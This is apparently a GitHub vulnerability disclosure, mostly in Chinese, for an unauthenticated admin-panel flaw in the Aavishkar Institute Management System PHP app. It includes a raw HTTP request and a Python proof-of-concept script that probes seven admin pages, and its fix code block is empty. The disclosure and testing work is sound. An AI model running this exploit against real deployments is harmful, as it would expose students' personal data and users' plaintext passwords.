Harshsanghvi108/CVE-2026-PENDING-AAVISHKAR-1
GitHub: Harshsanghvi108/CVE-2026-PENDING-AAVISHKAR-1
针对 Aavishkar 学院管理系统失效访问控制漏洞的 PoC 验证工具,演示未经身份验证即可访问完整管理面板并暴露所有用户数据的安全缺陷。
Stars: 0 | Forks: 0
# CVE-2026-PENDING — Aavishkar Institute Management System
## 失效的访问控制 — 无需身份验证即可访问完整 Admin Panel
## 详情
| 字段 | 信息 |
|---|---|
| **CVE ID** | Pending MITRE Assignment |
| **产品** | Aavishkar Institute Management System |
| **供应商** | TanuSharma08 |
| **供应商 URL** | https://github.com/TanuSharma08/aavishkar-institute-admission-system-php |
| **漏洞类型** | 失效的访问控制 |
| **受影响文件** | admin/users.php, admin/admissionlist.php, admin/feedback.php, admin/messages.php, admin/studquery.php, admin/lv_app.php, admin/courses.php |
| **CWE** | CWE-306 |
| **CVSSv3 评分** | 9.8 Critical |
| **CVSSv3 Vector** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **发现者** | Harsh D Sanghvi |
| **发现日期** | 2026 年 7 月 31 日 |
| **已通知供应商** | 2026 年 7 月 31 日 |
| **披露截止日期** | 2026 年 10 月 29 日 |
## 描述
Aavishkar Institute Management System 存在失效的访问控制漏洞,所有管理页面均可在无任何身份验证的情况下访问。admin/header.php 文件在调用 session_start() 之前输出了 HTML,导致 header() 重定向静默失败。任何未经身份验证的远程攻击者都可以在未登录的情况下访问所有学生记录、用户凭证、入学申请、消息和反馈。
## 根本原因
admin/header.php 中的会话检查位于 HTML 输出之后:
```
";
session_start();
if(!isset($_SESSION['admin']))
{
header('location:../login.php');
}
?>
```
由于在调用 session_start() 和 header() 之前已经输出了 HTML,PHP 无法发送重定向 header。页面继续加载,并将所有数据返回给未经身份验证的访问者。
## 受影响的管理页面
| 页面 | 泄露的数据 |
|---|---|
| admin/users.php | 所有用户账户、手机号码、明文密码 |
| admin/admissionlist.php | 包含个人信息的所有学生入学记录 |
| admin/feedback.php | 所有用户反馈及联系方式 |
| admin/messages.php | 发送给学生的所有管理员消息 |
| admin/studquery.php | 所有学生查询及回复 |
| admin/lv_app.php | 所有请假申请 |
| admin/courses.php | 所有课程管理 |
## 概念验证
步骤 1 — 发送此请求(不带任何 cookie 或 session):
```
GET /admin/users.php HTTP/1.1
Host: target.com
```
步骤 2 — 结果:返回 HTTP 200 及所有用户数据。
无需登录。无需 session cookie。
## PoC 脚本
```
#!/usr/bin/env python3
"""
CVE-2026-PENDING
Product : Aavishkar Institute Management System
Type : Broken Access Control
CWE : CWE-306
CVSSv3 : 9.8 Critical
Author : Harsh D Sanghvi
Date : 31 July 2026
"""
import requests
import sys
def main():
target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
print("=" * 60)
print(" Broken Access Control - Admin Panel No Auth")
print(" Aavishkar Institute Management System")
print("=" * 60)
print(f"[*] Target: {target}")
print()
pages = [
"admin/users.php",
"admin/admissionlist.php",
"admin/feedback.php",
"admin/messages.php",
"admin/studquery.php",
"admin/lv_app.php",
"admin/courses.php",
]
confirmed = []
for page in pages:
r = requests.get(f"{target}/{page}")
status = "EXPOSED" if r.status_code == 200 and len(r.text) > 300 else "SAFE"
print(f"[{status}] /{page} -> HTTP {r.status_code} ({len(r.text)} bytes)")
if status == "EXPOSED":
confirmed.append(page)
print()
if confirmed:
print(f"[+] SUCCESS - {len(confirmed)} admin pages exposed without login!")
print(f"[+] No session cookie required")
print(f"[+] All student and user data is exposed to anyone")
else:
print("[-] Target does not appear vulnerable")
if __name__ == "__main__":
main()
```
## 影响
- 所有学生个人数据均暴露给未经身份验证的访问者
- 所有用户账户(包括手机号码和明文密码)均被泄露
- 所有入学记录、消息、反馈和查询均可被访问
- 无需身份验证 — 互联网上的任何人都可利用此漏洞
- 与同一代码库中的 SQL 注入漏洞结合使用,可导致数据被完全破坏
## 修复方案
在 admin/header.php 中,将 session_start() 移至任何 HTML 输出之前:
```
```
## 时间线
| 日期 | 事件 |
|---|---|
| 2026 年 7 月 31 日 | 发现漏洞 |
| 2026 年 7 月 31 日 | 通过 cveform-legacy.mitre.org 向 MITRE 报告 |
| 2026 年 7 月 31 日 | 通过 GitHub issue 通知供应商 |
| Pending | MITRE 分配 CVE ID |
| 2026 年 10 月 29 日 | 公开披露截止日期 |
## 参考
- 供应商 Repo: https://github.com/TanuSharma08/aavishkar-institute-admission-system-php
- 供应商 Issue: https://github.com/TanuSharma08/aavishkar-institute-admission-system-php/issues/1
- CWE-306: https://cwe.mitre.org/data/definitions/306.html
- OWASP 失效的访问控制: https://owasp.org/Top10/A01_2021-Broken_Access_Control/
## 发现者
**Harsh D Sanghvi**
独立安全研究员
GitHub: https://github.com/Harshsanghvi108
标签:OpenVAS, PHP, 教育系统, 权限绕过, 漏洞披露, 访问控制缺陷, 逆向工具